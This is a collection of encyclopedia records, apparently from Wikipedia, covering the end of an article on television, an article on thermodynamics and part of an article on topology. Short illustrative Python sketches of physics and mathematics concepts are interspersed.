per year to children in the United States, at a cost of millions of dollars per year in emergency care. A 2017 study in The Journal of Human Resources found that exposure to cable television reduced cognitive ability and high school graduation rates for boys. This effect was stronger for boys from more educated families. The article suggests a mechanism whereby light television entertainment crowds out more cognitively stimulating activities. With the high lead content in CRTs and the rapid diffusion of new flat-panel display technologies, some of which (LCDs) use lamps that contain mercury, there is growing concern about electronic waste from discarded televisions. Related occupational health concerns exist as well for disassemblers removing copper wiring and other materials from CRTs. Further environmental concerns related to television design and use relate to the devices' increasing electrical energy requirements.
Technology
Media and communication
null
29952
https://en.wikipedia.org/wiki/Thermodynamics
Thermodynamics
Thermodynamics is a branch of physics that deals with heat, work, and temperature, and their relation to energy, entropy, and the physical properties of matter and radiation. The behavior of these quantities is governed by the four laws of thermodynamics, which convey a quantitative description using measurable macroscopic physical quantities but may be explained in terms of microscopic constituents by statistical mechanics. Thermodynamics applies to a wide variety of topics in science and engineering, especially physical chemistry, biochemistry, chemical engineering, and mechanical engineering, but also in other complex fields such as meteorology. Historically, thermodynamics developed out of a desire to increase the efficiency of early steam engines, particularly through the work of French physicist Sadi Carnot (1824), who believed that engine efficiency was the key that could help France win the Napoleonic Wars. Scots-Irish physicist Lord Kelvin was the first to formulate a concise definition of thermodynamics, in 1854, which stated: "Thermo-dynamics is the subject of the relation of heat to forces acting between contiguous parts of bodies, and the relation of heat to electrical agency." German physicist and mathematician Rudolf Clausius restated Carnot's principle, known as the Carnot cycle, and gave the theory of heat a truer and sounder basis. His most important paper, "On the Moving Force of Heat", published in 1850, first stated the second law of thermodynamics. In 1865 he introduced the concept of entropy. In 1870 he introduced the virial theorem, which applied to heat. The initial application of thermodynamics to mechanical heat engines was quickly extended to the study of chemical compounds and chemical reactions. Chemical thermodynamics studies the nature of the role of entropy in the process of chemical reactions and has provided the bulk of expansion and knowledge of the field. Other formulations of thermodynamics emerged. Statistical thermodynamics, or statistical mechanics, concerns itself with statistical predictions of the collective motion of particles from their microscopic behavior. In 1909, Constantin Carathéodory presented a purely mathematical approach in an axiomatic formulation, a description often referred to as geometrical thermodynamics. Introduction A description of any thermodynamic system employs the four laws of thermodynamics that form an axiomatic basis. The first law specifies that energy can be transferred between physical systems as heat, as work, and with transfer of matter. The second law defines the existence of a quantity called entropy, which describes the direction in which a system can thermodynamically evolve, quantifies the state of order of a system, and can be used to quantify the useful work that can be extracted from the system. In thermodynamics, interactions between large ensembles of objects are studied and categorized. Central to this are the concepts of the thermodynamic system and its surroundings. A system is composed of particles whose average motions define its properties, and those properties are in turn related to one another through equations of state. Properties can be combined to express internal energy and thermodynamic potentials, which are useful for determining conditions for equilibrium and spontaneous processes. With these tools, thermodynamics can be used to describe how systems respond to changes in their environment. 
This can be applied to a wide variety of topics in science and engineering, such as engines, phase transitions, chemical reactions, transport phenomena, and even black holes. The results of thermodynamics are essential for other fields of physics and for chemistry, chemical engineering, corrosion engineering, aerospace engineering, mechanical engineering, cell biology, biomedical engineering, materials science, and economics, to name a few. This article is focused mainly on classical thermodynamics, which primarily studies systems in thermodynamic equilibrium. Non-equilibrium thermodynamics is often treated as an extension of the classical treatment, but statistical mechanics has brought many advances to that field. History The history of thermodynamics as a scientific discipline generally begins with Otto von Guericke who, in 1650, designed and built the world's first vacuum pump and demonstrated a vacuum using his Magdeburg hemispheres. Guericke was driven to make a vacuum in order to disprove Aristotle's long-held supposition that 'nature abhors a vacuum'. Shortly after Guericke, the Anglo-Irish physicist and chemist Robert Boyle had learned of Guericke's designs and, in 1656, in coordination with English scientist Robert Hooke, built an air pump. Using this pump, Boyle and Hooke noticed a correlation between pressure, temperature, and volume. In time, Boyle's Law was formulated, which states that, for a gas at constant temperature, pressure and volume are inversely proportional. Then, in 1679, based on these concepts, an associate of Boyle's named Denis Papin built a steam digester, which was a closed vessel with a tightly fitting lid that confined steam until a high pressure was generated. Later designs implemented a steam release valve that kept the machine from exploding. By watching the valve rhythmically move up and down, Papin conceived of the idea of a piston and a cylinder engine. He did not, however, follow through with his design. Nevertheless, in 1697, based on Papin's designs, engineer Thomas Savery built the first engine, followed by Thomas Newcomen in 1712. Although these early engines were crude and inefficient, they attracted the attention of the leading scientists of the time. The fundamental concepts of heat capacity and latent heat, which were necessary for the development of thermodynamics, were developed by Professor Joseph Black at the University of Glasgow, where James Watt was employed as an instrument maker. Black and Watt performed experiments together, but it was Watt who conceived the idea of the external condenser, which resulted in a large increase in steam engine efficiency. Drawing on all the previous work led Sadi Carnot, the "father of thermodynamics", to publish Reflections on the Motive Power of Fire (1824), a discourse on heat, power, energy, and engine efficiency. The book outlined the basic energetic relations between the Carnot engine, the Carnot cycle, and motive power. It marked the start of thermodynamics as a modern science. The first thermodynamic textbook was written in 1859 by William Rankine, originally trained as a physicist and a civil and mechanical engineering professor at the University of Glasgow. The first and second laws of thermodynamics emerged simultaneously in the 1850s, primarily out of the works of William Rankine, Rudolf Clausius, and William Thomson (Lord Kelvin). The foundations of statistical thermodynamics were set out by physicists such as James Clerk Maxwell, Ludwig Boltzmann, Max Planck, Rudolf Clausius, and J. Willard Gibbs. 
Clausius, who first stated the basic ideas of the second law in his paper "On the Moving Force of Heat", published in 1850, and is called "one of the founding fathers of thermodynamics", introduced the concept of entropy in 1865. During the years 1873–76 the American mathematical physicist Josiah Willard Gibbs published a series of three papers, the most famous being On the Equilibrium of Heterogeneous Substances, in which he showed how thermodynamic processes, including chemical reactions, could be graphically analyzed. By studying the energy, entropy, volume, temperature, and pressure of the thermodynamic system in such a manner, one can determine whether a process would occur spontaneously. Also, Pierre Duhem in the 19th century wrote about chemical thermodynamics. During the early 20th century, chemists such as Gilbert N. Lewis, Merle Randall, and E. A. Guggenheim applied the mathematical methods of Gibbs to the analysis of chemical processes. Etymology Thermodynamics has an intricate etymology. By a surface-level analysis, the word consists of two parts that can be traced back to Ancient Greek. Firstly, thermo- ("of heat"; used in words such as thermometer) can be traced back to the root θέρμη therme, meaning "heat". Secondly, the word dynamics ("science of force [or power]") can be traced back to the root δύναμις dynamis, meaning "power". In 1849, the adjective thermo-dynamic was used by William Thomson. In 1854, the noun thermo-dynamics was used by Thomson and William Rankine to represent the science of generalized heat engines. Pierre Perrot claims that the term thermodynamics was coined by James Joule in 1858 to designate the science of relations between heat and power; however, Joule never used that term, but used instead the term perfect thermo-dynamic engine in reference to Thomson's 1849 phraseology. Branches of thermodynamics The study of thermodynamical systems has developed into several related branches, each using a different fundamental model as a theoretical or experimental basis, or applying the principles to varying types of systems. Classical thermodynamics Classical thermodynamics is the description of the states of thermodynamic systems at near-equilibrium that uses macroscopic, measurable properties. It is used to model exchanges of energy, work, and heat based on the laws of thermodynamics. The qualifier classical reflects the fact that it represents the first level of understanding of the subject as it developed in the 19th century and describes the changes of a system in terms of macroscopic empirical (large-scale, measurable) parameters. A microscopic interpretation of these concepts was later provided by the development of statistical mechanics. Statistical mechanics Statistical mechanics, also known as statistical thermodynamics, emerged with the development of atomic and molecular theories in the late 19th century and early 20th century, and supplemented classical thermodynamics with an interpretation of the microscopic interactions between individual particles or quantum-mechanical states. This field relates the microscopic properties of individual atoms and molecules to the macroscopic, bulk properties of materials that can be observed on the human scale, thereby explaining classical thermodynamics as a natural result of statistics, classical mechanics, and quantum theory at the microscopic level. 
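To make this microscopic-to-macroscopic link concrete, here is a minimal illustrative sketch (not from the article; the two energy levels and the temperature are arbitrary assumed values) of how Boltzmann statistics turn microstate probabilities into a macroscopic internal energy:

```python
import math

# A two-level system in contact with a heat bath at temperature T,
# treated with Boltzmann statistics (illustrative values throughout).
k_B = 1.380649e-23       # Boltzmann constant, J/K
T = 300.0                # bath temperature, K (assumed)
energies = [0.0, 4e-21]  # microstate energies in joules (assumed)

# Boltzmann factors and the partition function Z.
weights = [math.exp(-E / (k_B * T)) for E in energies]
Z = sum(weights)

# Probability of each microstate, and internal energy as a statistical average.
probs = [w / Z for w in weights]
U = sum(p * E for p, E in zip(probs, energies))

print(probs)  # the higher-energy state is exponentially less likely
print(U)      # macroscopic internal energy emerges as an ensemble average
```

The same averaging idea, applied to realistic numbers of particles, is what lets statistical mechanics recover the quantities of classical thermodynamics.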
Chemical thermodynamics Chemical thermodynamics is the study of the interrelation of energy with chemical reactions or with a physical change of state within the confines of the laws of thermodynamics. The primary objective of chemical thermodynamics is determining the spontaneity of a given transformation. Equilibrium thermodynamics Equilibrium thermodynamics is the study of transfers of matter and energy in systems or bodies that, by agencies in their surroundings, can be driven from one state of thermodynamic equilibrium to another. The term 'thermodynamic equilibrium' indicates a state of balance, in which all macroscopic flows are zero; in the case of the simplest systems or bodies, their intensive properties are homogeneous, and their pressures are perpendicular to their boundaries. In an equilibrium state there are no unbalanced potentials, or driving forces, between macroscopically distinct parts of the system. A central aim in equilibrium thermodynamics is: given a system in a well-defined initial equilibrium state, and given its surroundings, and given its constitutive walls, to calculate what will be the final equilibrium state of the system after a specified thermodynamic operation has changed its walls or surroundings. Non-equilibrium thermodynamics Non-equilibrium thermodynamics is a branch of thermodynamics that deals with systems that are not in thermodynamic equilibrium. Most systems found in nature are not in thermodynamic equilibrium because they are not in stationary states, and are continuously and discontinuously subject to flux of matter and energy to and from other systems. The thermodynamic study of non-equilibrium systems requires more general concepts than are dealt with by equilibrium thermodynamics. Many natural systems still today remain beyond the scope of currently known macroscopic thermodynamic methods. Laws of thermodynamics Thermodynamics is principally based on a set of four laws which are universally valid when applied to systems that fall within the constraints implied by each. In the various theoretical descriptions of thermodynamics these laws may be expressed in seemingly differing forms, but the most prominent formulations are the following. Zeroth law The zeroth law of thermodynamics states: If two systems are each in thermal equilibrium with a third, they are also in thermal equilibrium with each other. This statement implies that thermal equilibrium is an equivalence relation on the set of thermodynamic systems under consideration. Systems are said to be in equilibrium if the small, random exchanges between them (e.g. Brownian motion) do not lead to a net change in energy. This law is tacitly assumed in every measurement of temperature. Thus, if one seeks to decide whether two bodies are at the same temperature, it is not necessary to bring them into contact and measure any changes of their observable properties in time. The law provides an empirical definition of temperature, and justification for the construction of practical thermometers. The zeroth law was not initially recognized as a separate law of thermodynamics, as its basis in thermodynamical equilibrium was implied in the other laws. The first, second, and third laws had been explicitly stated already, and found common acceptance in the physics community before the importance of the zeroth law for the definition of temperature was realized. As it was impractical to renumber the other laws, it was named the zeroth law. 
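The equivalence-relation reading of the zeroth law can be illustrated with a toy sketch (the bodies and the observed equilibria below are invented for the example; this is not from the article): given pairwise observations of thermal equilibrium, transitivity lets one sort bodies into classes that share a single temperature.

```python
# Toy illustration: thermal equilibrium as an equivalence relation.
# Given observed pairwise equilibria, transitivity groups bodies into
# classes sharing one temperature (a simple union-find does the sorting).
def classes(bodies, in_equilibrium):
    """Group bodies into equivalence classes via union-find."""
    parent = {b: b for b in bodies}

    def find(x):
        while parent[x] != x:
            parent[x] = parent[parent[x]]  # path compression
            x = parent[x]
        return x

    for a, b in in_equilibrium:
        parent[find(a)] = find(b)  # merge the two classes

    groups = {}
    for b in bodies:
        groups.setdefault(find(b), []).append(b)
    return list(groups.values())

# A~C and B~C observed; the zeroth law then implies A~B.
print(classes(["A", "B", "C", "D"], [("A", "C"), ("B", "C")]))
# -> [['A', 'B', 'C'], ['D']]  (A, B, C share a temperature; D is separate)
```

Here the observations A~C and B~C force A~B, which is exactly what licenses using body C as a thermometer.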
First law The first law of thermodynamics states: In a process without transfer of matter, the change in internal energy, ΔU, of a thermodynamic system is equal to the energy gained as heat, Q, less the thermodynamic work, W, done by the system on its surroundings: ΔU = Q − W, where ΔU denotes the change in the internal energy of a closed system (for which heat or work through the system boundary are possible, but matter transfer is not possible), Q denotes the quantity of energy supplied to the system as heat, and W denotes the amount of thermodynamic work done by the system on its surroundings. For example, if a gas absorbs Q = 500 J of heat while doing W = 200 J of work on its surroundings, its internal energy rises by ΔU = 500 J − 200 J = 300 J. An equivalent statement is that perpetual motion machines of the first kind are impossible; work done by a system on its surroundings requires that the system's internal energy decrease or be consumed, so that the amount of internal energy lost by that work must be resupplied as heat by an external energy source or as work by an external machine acting on the system (so that ΔU is recovered) to make the system work continuously. For processes that include transfer of matter, a further statement is needed: with due account of the respective fiducial reference states of the systems, when two systems, which may be of different chemical compositions, initially separated only by an impermeable wall, and otherwise isolated, are combined into a new system by the thermodynamic operation of removal of the wall, then U₀ = U₁ + U₂, where U₀ denotes the internal energy of the combined system, and U₁ and U₂ denote the internal energies of the respective separated systems. Adapted for thermodynamics, this law is an expression of the principle of conservation of energy, which states that energy can be transformed (changed from one form to another), but cannot be created or destroyed. Internal energy is a principal property of the thermodynamic state, while heat and work are modes of energy transfer by which a process may change this state. A change of internal energy of a system may be achieved by any combination of heat added or removed and work performed on or by the system. As a function of state, the internal energy does not depend on the manner, or on the path through intermediate steps, by which the system arrived at its state. Second law A traditional version of the second law of thermodynamics states: Heat does not spontaneously flow from a colder body to a hotter body. The second law refers to a system of matter and radiation, initially with inhomogeneities in temperature, pressure, chemical potential, and other intensive properties, that are due to internal 'constraints', or impermeable rigid walls, within it, or to externally imposed forces. The law observes that, when the system is isolated from the outside world and from those forces, there is a definite thermodynamic quantity, its entropy, that increases as the constraints are removed, eventually reaching a maximum value at thermodynamic equilibrium, when the inhomogeneities practically vanish. For systems that are initially far from thermodynamic equilibrium, no general physical principle is known that determines the rates of approach to thermodynamic equilibrium, though several have been proposed; thermodynamics does not deal with such rates. The many versions of the second law all express the general irreversibility of the transitions involved in systems approaching thermodynamic equilibrium. 
In macroscopic thermodynamics, the second law is a basic observation applicable to any actual thermodynamic process; in statistical thermodynamics, the second law is postulated to be a consequence of molecular chaos. Third law The third law of thermodynamics states: As the temperature of a system approaches absolute zero, all processes cease and the entropy of the system approaches a minimum value. This law of thermodynamics is a statistical law of nature regarding entropy and the impossibility of reaching absolute zero of temperature. This law provides an absolute reference point for the determination of entropy. The entropy determined relative to this point is the absolute entropy. Alternate definitions include "the entropy of all systems and of all states of a system is smallest at absolute zero," or equivalently "it is impossible to reach the absolute zero of temperature by any finite number of processes". Absolute zero, at which all activity would stop if it were possible to achieve, is −273.15 °C (degrees Celsius), or −459.67 °F (degrees Fahrenheit), or 0 K (kelvin), or 0 °R (degrees Rankine). System models An important concept in thermodynamics is the thermodynamic system, which is a precisely defined region of the universe under study. Everything in the universe except the system is called the surroundings. A system is separated from the remainder of the universe by a boundary, which may be physical or notional, but serves to confine the system to a finite volume. Segments of the boundary are often described as walls; they have respective defined 'permeabilities'. Transfers of energy as work, or as heat, or of matter, between the system and the surroundings, take place through the walls, according to their respective permeabilities. Matter or energy that passes across the boundary so as to effect a change in the internal energy of the system needs to be accounted for in the energy balance equation. The volume contained by the walls can be the region surrounding a single atom resonating energy, such as Max Planck defined in 1900; it can be a body of steam or air in a steam engine, such as Sadi Carnot defined in 1824. The system could also be just one nuclide (i.e. a system of quarks) as hypothesized in quantum thermodynamics. When a looser viewpoint is adopted, and the requirement of thermodynamic equilibrium is dropped, the system can be the body of a tropical cyclone, such as Kerry Emanuel theorized in 1986 in the field of atmospheric thermodynamics, or the event horizon of a black hole. Boundaries are of four types: fixed, movable, real, and imaginary. For example, in an engine, a fixed boundary means the piston is locked at its position, within which a constant volume process might occur. If the piston is allowed to move, that boundary is movable, while the cylinder and cylinder head boundaries are fixed. For closed systems, boundaries are real, while for open systems boundaries are often imaginary. In the case of a jet engine, a fixed imaginary boundary might be assumed at the intake of the engine, fixed boundaries along the surface of the case, and a second fixed imaginary boundary across the exhaust nozzle. Generally, thermodynamics distinguishes three classes of systems, defined in terms of what is allowed to cross their boundaries: open systems, which can exchange both matter and energy with their surroundings; closed systems, which can exchange energy but not matter; and isolated systems, which can exchange neither. As time passes in an isolated system, internal differences of pressures, densities, and temperatures tend to even out. A system in which all equalizing processes have gone to completion is said to be in a state of thermodynamic equilibrium. 
Once in thermodynamic equilibrium, a system's properties are, by definition, unchanging in time. Systems in equilibrium are much simpler and easier to understand than systems which are not in equilibrium. Often, when analysing a dynamic thermodynamic process, the simplifying assumption is made that each intermediate state in the process is at equilibrium; such processes develop so slowly as to allow each intermediate step to be an equilibrium state and are said to be reversible processes. States and processes When a system is at equilibrium under a given set of conditions, it is said to be in a definite thermodynamic state. The state of the system can be described by a number of state quantities that do not depend on the process by which the system arrived at its state. They are called intensive variables or extensive variables according to how they change when the size of the system changes. The properties of the system can be described by an equation of state which specifies the relationship between these variables. State may be thought of as the instantaneous quantitative description of a system with a set number of variables held constant. A thermodynamic process may be defined as the energetic evolution of a thermodynamic system proceeding from an initial state to a final state. It can be described by process quantities. Typically, each thermodynamic process is distinguished from other processes in energetic character according to what parameters, such as temperature, pressure, or volume, are held fixed. Furthermore, it is useful to group these processes into pairs, in which each variable held constant is one member of a conjugate pair. Several commonly studied thermodynamic processes are:
Adiabatic process: occurs without loss or gain of energy by heat
Isenthalpic process: occurs at constant enthalpy
Isentropic process: a reversible adiabatic process, occurs at constant entropy
Isobaric process: occurs at constant pressure
Isochoric process: occurs at constant volume (also called isometric/isovolumetric)
Isothermal process: occurs at a constant temperature
Steady state process: occurs without a change in the internal energy
Instrumentation There are two types of thermodynamic instruments, the meter and the reservoir. A thermodynamic meter is any device which measures any parameter of a thermodynamic system. In some cases, the thermodynamic parameter is actually defined in terms of an idealized measuring instrument. For example, the zeroth law states that if two bodies are in thermal equilibrium with a third body, they are also in thermal equilibrium with each other. This principle, as noted by James Maxwell in 1872, asserts that it is possible to measure temperature. An idealized thermometer is a sample of an ideal gas at constant pressure. From the ideal gas law pV = nRT, the volume of such a sample can be used as an indicator of temperature; in this manner it defines temperature (a short numerical sketch follows this passage). Although pressure is defined mechanically, a pressure-measuring device, called a barometer, may also be constructed from a sample of an ideal gas held at a constant temperature. A calorimeter is a device which is used to measure and define the internal energy of a system. A thermodynamic reservoir is a system which is so large that its state parameters are not appreciably altered when it is brought into contact with the system of interest. When the reservoir is brought into contact with the system, the system is brought into equilibrium with the reservoir. 
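The numerical sketch promised above for the ideal-gas thermometer (the amount of gas and the pressure are assumed example values):

```python
# Sketch of an ideal-gas thermometer. At constant n and p, the ideal gas
# law pV = nRT makes the measured volume a direct index of temperature.
R = 8.314          # gas constant, J/(mol*K)
n = 1.0            # amount of gas, mol (assumed)
p = 101_325.0      # constant pressure, Pa (1 atm, assumed)

def temperature_from_volume(V):
    """Invert pV = nRT to read temperature off the gas volume (V in m^3)."""
    return p * V / (n * R)

# Roughly 22.4 L near 0 degrees C, ~24.8 L near room temperature.
for V in (0.0224, 0.0248):
    print(f"V = {V * 1000:.1f} L  ->  T = {temperature_from_volume(V):.1f} K")
```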
For example, a pressure reservoir is a system at a particular pressure, which imposes that pressure upon the system to which it is mechanically connected. The Earth's atmosphere is often used as a pressure reservoir. The ocean can act as a temperature reservoir when used to cool power plants. Conjugate variables The central concept of thermodynamics is that of energy, the ability to do work. By the First Law, the total energy of a system and its surroundings is conserved. Energy may be transferred into a system by heating, compression, or addition of matter, and extracted from a system by cooling, expansion, or extraction of matter. In mechanics, for example, energy transfer equals the product of the force applied to a body and the resulting displacement. Conjugate variables are pairs of thermodynamic concepts, with the first being akin to a "force" applied to some thermodynamic system, the second being akin to the resulting "displacement", and the product of the two equaling the amount of energy transferred. The common conjugate variables are: Pressure-volume (the mechanical parameters); Temperature-entropy (thermal parameters); Chemical potential-particle number (material parameters). Potentials Thermodynamic potentials are different quantitative measures of the stored energy in a system. Potentials are used to measure the energy changes in systems as they evolve from an initial state to a final state. The potential used depends on the constraints of the system, such as constant temperature or pressure. For example, the Helmholtz and Gibbs energies are the energies available in a system to do useful work when the temperature and volume or the pressure and temperature are fixed, respectively. Thermodynamic potentials cannot be measured in laboratories, but can be computed using molecular thermodynamics. The five most well known potentials are the internal energy U, the Helmholtz free energy A = U − TS, the enthalpy H = U + pV, the Gibbs free energy G = U + pV − TS, and the Landau (grand) potential Ω = U − TS − Σi μiNi, where T is the temperature, S the entropy, p the pressure, V the volume, μ the chemical potential, N the number of particles in the system, and i the count of particle types in the system (a small computational sketch of these definitions appears below). Thermodynamic potentials can be derived from the energy balance equation applied to a thermodynamic system. Other thermodynamic potentials can also be obtained through Legendre transformation. Axiomatic thermodynamics Axiomatic thermodynamics is a mathematical discipline that aims to describe thermodynamics in terms of rigorous axioms, for example by finding a mathematically rigorous way to express the familiar laws of thermodynamics. The first attempt at an axiomatic theory of thermodynamics was Constantin Carathéodory's 1909 work Investigations on the Foundations of Thermodynamics, which made use of Pfaffian systems and the concept of adiabatic accessibility, a notion that was introduced by Carathéodory himself. In this formulation, thermodynamic concepts such as heat, entropy, and temperature are derived from quantities that are more directly measurable. Theories that came later differed in that they made assumptions regarding thermodynamic processes with arbitrary initial and final states, as opposed to considering only neighboring states. Applied fields
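Picking up the potential definitions given above under Potentials, here is a minimal sketch (our own illustrative code; the state values are invented, and a single particle type is assumed) computing the common potentials from U, T, S, p, V, μ and N:

# Thermodynamic potentials from state variables (single particle type).
# A sketch under the textbook definitions quoted above; numbers are illustrative.
def potentials(U, T, S, p, V, mu=0.0, N=0.0):
    return {
        "internal energy U":        U,
        "Helmholtz A = U - TS":     U - T * S,
        "enthalpy H = U + pV":      U + p * V,
        "Gibbs G = U + pV - TS":    U + p * V - T * S,
        "Landau O = U - TS - muN":  U - T * S - mu * N,
    }

for name, value in potentials(U=1000.0, T=300.0, S=2.0, p=1e5, V=1e-3).items():
    print(f"{name}: {value:.1f} J")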
Physical sciences
Physics
null
29954
https://en.wikipedia.org/wiki/Topology
Topology
Topology (from the Greek words topos, 'place', and logos, 'study') is the branch of mathematics concerned with the properties of a geometric object that are preserved under continuous deformations, such as stretching, twisting, crumpling, and bending; that is, without closing holes, opening holes, tearing, gluing, or passing through itself. A topological space is a set endowed with a structure, called a topology, which allows defining continuous deformation of subspaces, and, more generally, all kinds of continuity. Euclidean spaces, and, more generally, metric spaces are examples of topological spaces, as any distance or metric defines a topology. The deformations that are considered in topology are homeomorphisms and homotopies. A property that is invariant under such deformations is a topological property. The following are basic examples of topological properties: the dimension, which allows distinguishing between a line and a surface; compactness, which allows distinguishing between a line and a circle; connectedness, which allows distinguishing a circle from two non-intersecting circles. The ideas underlying topology go back to Gottfried Wilhelm Leibniz, who in the 17th century envisioned the geometria situs and the analysis situs. Leonhard Euler's Seven Bridges of Königsberg problem and polyhedron formula are arguably the field's first theorems. The term topology was introduced by Johann Benedict Listing in the 19th century, although it was not until the first decades of the 20th century that the idea of a topological space was developed. Motivation The motivating insight behind topology is that some geometric problems depend not on the exact shape of the objects involved, but rather on the way they are put together. For example, the square and the circle have many properties in common: they are both one-dimensional objects (from a topological point of view) and both separate the plane into two parts, the part inside and the part outside. In one of the first papers in topology, Leonhard Euler demonstrated that it was impossible to find a route through the town of Königsberg (now Kaliningrad) that would cross each of its seven bridges exactly once. This result did not depend on the lengths of the bridges or on their distance from one another, but only on connectivity properties: which bridges connect to which islands or riverbanks. This Seven Bridges of Königsberg problem led to the branch of mathematics known as graph theory. Similarly, the hairy ball theorem of algebraic topology says that "one cannot comb the hair flat on a hairy ball without creating a cowlick." This fact is immediately convincing to most people, even though they might not recognize the more formal statement of the theorem, that there is no nonvanishing continuous tangent vector field on the sphere. As with the Bridges of Königsberg, the result does not depend on the shape of the sphere; it applies to any kind of smooth blob, as long as it has no holes. To deal with these problems that do not rely on the exact shape of the objects, one must be clear about just what properties these problems do rely on. From this need arises the notion of homeomorphism. The impossibility of crossing each bridge just once applies to any arrangement of bridges homeomorphic to those in Königsberg, and the hairy ball theorem applies to any space homeomorphic to a sphere. Intuitively, two spaces are homeomorphic if one can be deformed into the other without cutting or gluing. 
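Euler's connectivity argument for the Seven Bridges problem mentioned above can be checked mechanically: a connected multigraph admits a walk traversing every edge exactly once only if at most two of its vertices have odd degree. A minimal sketch (our own encoding; the labels A, B for the river banks and C, D for the two islands are ours):

# Degree-parity test for an Eulerian path, applied to the Königsberg bridges.
bridges = [("A", "C"), ("A", "C"), ("B", "C"), ("B", "C"),
           ("A", "D"), ("B", "D"), ("C", "D")]

degree = {}
for u, v in bridges:
    degree[u] = degree.get(u, 0) + 1
    degree[v] = degree.get(v, 0) + 1

odd = [v for v, d in degree.items() if d % 2 == 1]
print(degree)           # every land mass has odd degree (3, 5, 3, 3)
print(len(odd) <= 2)    # False: four odd vertices, so no such route exists

Note that only the incidence structure enters the computation; the lengths and positions of the bridges never appear, which is exactly Euler's point.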
A famous illustration of homeomorphism is the joke that a topologist cannot distinguish a coffee mug from a doughnut; a sufficiently pliable doughnut could be reshaped into a coffee cup by creating a dimple and progressively enlarging it, while shrinking the hole into a handle. Homeomorphism can be considered the most basic topological equivalence. Another is homotopy equivalence. This is harder to describe without getting technical, but the essential notion is that two objects are homotopy equivalent if they both result from "squishing" some larger object. History Topology, as a well-defined mathematical discipline, originates in the early part of the twentieth century, but some isolated results can be traced back several centuries. Among these are certain questions in geometry investigated by Leonhard Euler. His 1736 paper on the Seven Bridges of Königsberg is regarded as one of the first practical applications of topology. On 14 November 1750, Euler wrote to a friend that he had realized the importance of the edges of a polyhedron. This led to his polyhedron formula, V − E + F = 2 (where V, E, and F respectively indicate the number of vertices, edges, and faces of the polyhedron); for a cube, for instance, 8 − 12 + 6 = 2. Some authorities regard this analysis as the first theorem, signaling the birth of topology. Further contributions were made by Augustin-Louis Cauchy, Ludwig Schläfli, Johann Benedict Listing, Bernhard Riemann and Enrico Betti. Listing introduced the term "Topologie" in Vorstudien zur Topologie, written in his native German, in 1847, having used the word for ten years in correspondence before its first appearance in print. The English form "topology" was used in 1883 in Listing's obituary in the journal Nature to distinguish "qualitative geometry from the ordinary geometry in which quantitative relations chiefly are treated". Their work was corrected, consolidated and greatly extended by Henri Poincaré. In 1895, he published his ground-breaking paper on Analysis Situs, which introduced the concepts now known as homotopy and homology, which are now considered part of algebraic topology. Unifying the work on function spaces of Georg Cantor, Vito Volterra, Cesare Arzelà, Jacques Hadamard, Giulio Ascoli and others, Maurice Fréchet introduced the metric space in 1906. A metric space is now considered a special case of a general topological space, with any given topological space potentially giving rise to many distinct metric spaces. In 1914, Felix Hausdorff coined the term "topological space" and gave the definition for what is now called a Hausdorff space. Currently, a topological space is a slight generalization of Hausdorff spaces, given in 1922 by Kazimierz Kuratowski. Modern topology depends strongly on the ideas of set theory, developed by Georg Cantor in the later part of the 19th century. In addition to establishing the basic ideas of set theory, Cantor considered point sets in Euclidean space as part of his study of Fourier series. For further developments, see point-set topology and algebraic topology. The 2022 Abel Prize was awarded to Dennis Sullivan "for his groundbreaking contributions to topology in its broadest sense, and in particular its algebraic, geometric and dynamical aspects". Concepts Topologies on sets The term topology also refers to a specific mathematical idea central to the area of mathematics called topology. Informally, a topology describes how elements of a set relate spatially to each other. The same set can have different topologies. 
For instance, the real line, the complex plane, and the Cantor set can be thought of as the same set with different topologies. Formally, let X be a set and let τ be a family of subsets of X. Then τ is called a topology on X if: Both the empty set and X are elements of τ. Any union of elements of τ is an element of τ. Any intersection of finitely many elements of τ is an element of τ. If τ is a topology on X, then the pair (X, τ) is called a topological space. The notation X_τ may be used to denote a set X endowed with the particular topology τ. By definition, every topology is a π-system (these axioms are checked mechanically in the sketch following this passage). The members of τ are called open sets in X. A subset of X is said to be closed if its complement is in τ (that is, its complement is open). A subset of X may be open, closed, both (a clopen set), or neither. The empty set and X itself are always both closed and open. An open subset of X which contains a point x is called an open neighborhood of x. Continuous functions and homeomorphisms A function or map from one topological space to another is called continuous if the inverse image of any open set is open. If the function maps the real numbers to the real numbers (both spaces with the standard topology), then this definition of continuous is equivalent to the definition of continuous in calculus. If a continuous function is one-to-one and onto, and if the inverse of the function is also continuous, then the function is called a homeomorphism and the domain of the function is said to be homeomorphic to the range. Another way of saying this is that the function has a natural extension to the topology. If two spaces are homeomorphic, they have identical topological properties, and are considered topologically the same. The cube and the sphere are homeomorphic, as are the coffee cup and the doughnut. However, the sphere is not homeomorphic to the doughnut. Manifolds While topological spaces can be extremely varied and exotic, many areas of topology focus on the more familiar class of spaces known as manifolds. A manifold is a topological space that resembles Euclidean space near each point. More precisely, each point of an n-dimensional manifold has a neighborhood that is homeomorphic to the Euclidean space of dimension n. Lines and circles, but not figure eights, are one-dimensional manifolds. Two-dimensional manifolds are also called surfaces, although not all surfaces are manifolds. Examples include the plane, the sphere, and the torus, which can all be realized without self-intersection in three dimensions, and the Klein bottle and real projective plane, which cannot (that is, all their realizations are surfaces that are not manifolds). Topics General topology General topology is the branch of topology dealing with the basic set-theoretic definitions and constructions used in topology. It is the foundation of most other branches of topology, including differential topology, geometric topology, and algebraic topology. Another name for general topology is point-set topology. The basic object of study is topological spaces, which are sets equipped with a topology, that is, a family of subsets, called open sets, which is closed under finite intersections and (finite or infinite) unions. The fundamental concepts of topology, such as continuity, compactness, and connectedness, can be defined in terms of open sets. Intuitively, continuous functions take nearby points to nearby points. Compact sets are those that can be covered by finitely many sets of arbitrarily small size. Connected sets are sets that cannot be divided into two pieces that are far apart. 
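As promised above, the three axioms for a topology can be checked mechanically on a finite example. A minimal sketch (our own; on a finite set, checking all subfamilies covers arbitrary unions as well):

from itertools import chain, combinations

def is_topology(X, tau):
    """Check the open-set axioms on a finite set X with candidate family tau."""
    tau = {frozenset(s) for s in tau}
    if frozenset() not in tau or frozenset(X) not in tau:
        return False      # must contain the empty set and X itself
    subfamilies = chain.from_iterable(
        combinations(tau, r) for r in range(1, len(tau) + 1))
    for fam in subfamilies:
        if frozenset().union(*fam) not in tau:
            return False  # not closed under unions
        if frozenset(X).intersection(*fam) not in tau:
            return False  # not closed under (finite) intersections
    return True

X = {1, 2, 3}
print(is_topology(X, [set(), {1}, {1, 2}, X]))   # True
print(is_topology(X, [set(), {1}, {2}, X]))      # False: {1} U {2} is missing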
